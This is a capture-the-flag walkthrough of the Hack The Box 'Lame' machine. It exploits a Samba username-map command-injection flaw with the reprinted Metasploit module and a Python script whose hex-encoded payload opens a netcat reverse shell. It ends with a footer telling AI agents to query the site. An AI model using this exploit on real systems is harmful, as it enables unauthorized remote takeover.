# Hack The Box - Lame Walkthrough without Metasploit ![Lame](/files/-MP3Prl19B6uqttXsoUL) ## Enumeration First we start by running nmap against the target ```bash nmap -sC -sV 10.10.10.3 ``` ![Lame enumeration](/files/-MP3V6j1c8KaXs3XQys7) Since FTP port is open and seems to allow Anonymous login we will try to log in and see if we can find anything ![Empty ftp ](/files/-MP3d753ibO0_nnD5uvW) We found nothing there, next thing we can see in our initial enumeration is that Samba is running with version 3.0.20-Debian, with a fast google search we will find that it is vulnerable to a Remote Heap Overflow ```bash ## # $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB # For our customized version of session_setup_ntlmv1 CONST = Rex::Proto::SMB::Constants CRYPT = Rex::Proto::SMB::Crypt def initialize(info = {}) super(update_info(info, 'Name' => 'Samba "username map script" Command Execution', 'Description' => %q{ This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication! }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10040 $', 'References' => [ [ 'CVE', '2007-2447' ], [ 'OSVDB', '34700' ], [ 'BID', '23972' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ], [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, # root or nobody user 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', # *_perl and *_ruby work if they are installed # mileage may vary from system to system.. } }, 'Targets' => [ [ "Automatic", { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 14 2007')) register_options( [ Opt::RPORT(139) ], self.class) end def exploit connect # lol? username = "/=`nohup " + payload.encoded + "`" begin simple.client.negotiate(false) simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false) rescue ::Timeout::Error, XCEPT::LoginError # nothing, it either worked or it didn't ;) end handler end end ``` But that is a Metasploit module and we want to do it without it... if we read the exploit it says that its exploiting a vulnerability by **specifying a username containing shell meta characters**, executing commands... and **no authentication is needed** to exploit this vulnerability, with this information we can make our python script to exploit this samba version. ## Exploitation ### Creating the script This is the skeleton of the python script we will use to exploit this Samba version ```python #!/usr/bin/python3 #Samba 3.0.20-Debian from smb import * from smb.SMBConnection import * #msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT= -f python payload =(""); userID = "/=` nohup " + payload + "`" password = 'evil' ip = '10.10.10.3' conn = SMBConnection(userID, password,"some","thing", use_ntlm_v2=False) conn.connect(ip, 445) ``` ### Creating the Payload For the payload we will use **msfvenom** to create a reverse shell that we will capture with netcat: ``` msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT= -f python ``` ### Putting everything together ```python #!/usr/bin/python3 #Samba 3.0.20-Debian from smb import * from smb.SMBConnection import * #msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT= -f python payload =("\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6a" "\x7a\x6a\x63\x6c\x6e\x67\x3b\x20\x6e\x63\x20\x31\x30" "\x2e\x31\x30\x2e\x31\x34\x2e\x33\x20\x34\x34\x34\x34" "\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x6a\x7a\x6a\x63\x6c" "\x6e\x67\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20" "\x3e\x2f\x74\x6d\x70\x2f\x6a\x7a\x6a\x63\x6c\x6e\x67" "\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d" "\x70\x2f\x6a\x7a\x6a\x63\x6c\x6e\x67"); userID = "/=` nohup " + payload + "`" password = 'evil' ip = '10.10.10.3' conn = SMBConnection(userID, password,"some","thing", use_ntlm_v2=False) conn.connect(ip, 445) ``` Now we start a listener on another shell ```bash nc -nvlp 4444 ``` ![Netcat Listener](/files/-MP3eMoirPxoVLzOplgw) We might run into an error while executing the script ![Error running the script](/files/-MP3bewm8BO573ZtOAWz) In order to fix it we have to install the following python module if we are missing it: ```bash pip3 install pysmb ``` Now we can run it again.. and if we have our listener ready we should be able to get a shell back ## Pwnd We got a shell back, the first thing we look for is to make it interactive, for that matter we will see if the machine has python with ```bash which python ``` In this particular case that will be enought, we can use the following command to spawn an interactive shell ```bash python -c 'import pty;pty.spawn("/bin/bash")' ``` ![](/files/-MP3fWphp3HtU9tuegqS) Now we can grab our flag ;) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://4st1nus.gitbook.io/hackthebox/htb/lame-htb-walkthrough.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.